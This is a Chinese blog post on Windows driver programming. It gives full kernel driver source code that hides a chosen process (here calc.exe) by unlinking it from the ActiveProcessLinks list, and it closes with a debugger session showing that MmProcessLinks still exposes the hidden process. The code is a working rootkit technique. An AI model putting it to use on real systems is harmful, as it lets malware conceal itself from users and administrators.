首页 > WinDriver > WD-摘除ActiveProcessLinks链表隐藏指定PID进程
2013六月3

WD-摘除ActiveProcessLinks链表隐藏指定PID进程

功能实现比较简单:

1.传入pid

2.通过RtlGetVersion获得系统版本号,再得到ActiveProcessLinks对应版本的硬偏移

3.通过PsLookupProcessByProcessId获得eprocess,注意释放引用计数

4.RemoveEntryList即可

示例代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#include <ntifs.h>
 
NTSTATUS RemoveNodeFromActiveProcessLinks(HANDLE ProcessId)
{
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG_PTR offset = 0;
	PEPROCESS peprocess_obj=NULL;
	PLIST_ENTRY plist = NULL;
	do
	{
		RTL_OSVERSIONINFOEXW osver = {sizeof(RTL_OSVERSIONINFOEXW)};
		if (STATUS_SUCCESS != RtlGetVersion((PRTL_OSVERSIONINFOW)&osver))
		{
			KdPrint(("[RemoveNodeFromActiveProcessLinks]--RtlGetVersion fail\n"));
			break;
		}
 
		// 仅对xp测试
		if (5 == osver.dwMajorVersion
			&&1 == osver.dwMinorVersion)
		{
			offset = 0x88;//可通过windbg查看eprocess中的偏移
		}
 
		if (0 == offset)
		{
			break;
		}
 
		status = PsLookupProcessByProcessId(ProcessId, &peprocess_obj);
		if (!NT_SUCCESS(status))
		{
			break;
		}
 
		// 这里是PEPROCESS对应PLIST_ENTRY,结构体中是EPROCESS对应LIST_ENTRY
		plist = (ULONG_PTR)peprocess_obj+offset;// 得到当前的LIST_ENTRY
		if (MmIsAddressValid(plist))
		{
			RemoveEntryList(plist);
			status = STATUS_SUCCESS;
		}
 
		// 释放引用计数
		ObDereferenceObject(peprocess_obj);
 
	} while (FALSE);
 
	return status;
}
 
 
VOID DDKUnload (IN PDRIVER_OBJECT pDriverObject)
{
 
}
 
NTSTATUS DriverEntry (IN PDRIVER_OBJECT pDriverObject,
					  IN PUNICODE_STRING pRegistryPath)
{
	NTSTATUS status;
	KdPrint(("Enter DriverEntry\n"));
	pDriverObject->DriverUnload = DDKUnload;
 
	// 移走PID=1488的calc.exe
	RemoveNodeFromActiveProcessLinks(1488);
 
	status = STATUS_SUCCESS;
	KdPrint(("DriverEntry end\n"));
	return status;
}

效果图如下:(任务管理器已找不到,xuetr显示为红色)

hideprocess.png

但是,我们也可以通过MmProcessLinks来遍历进程,如:

kd> dt EPROCESS -y MmProcessLinks 84afdd08  
nt!EPROCESS
   +0x230 MmProcessLinks : _LIST_ENTRY [ 0x84c233c0 - 0x84e7f250 ]
kd> dt _LIST_ENTRY 84afdd08  + 230
ntdll!_LIST_ENTRY
 [ 0x84c233c0 - 0x84e7f250 ]
   +0x000 Flink            : 0x84c233c0 _LIST_ENTRY [ 0x84e9dfb8 - 0x84afdf38 ]
   +0x004 Blink            : 0x84e7f250 _LIST_ENTRY [ 0x84afdf38 - 0x84847700 ]

kd> dt EPROCESS -y ImageFileName 0x84c233c0-230
nt!EPROCESS
   +0x164 ImageFileName : [16]  "taskmgr.exe"
kd> dt EPROCESS -y ImageFileName 0x84e7f250-230
nt!EPROCESS
   +0x164 ImageFileName : [16]  "TPAutoConnect.e"

文章作者:hgy413
本文地址:https://hgy413.com/1457.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

本文的评论功能被关闭了.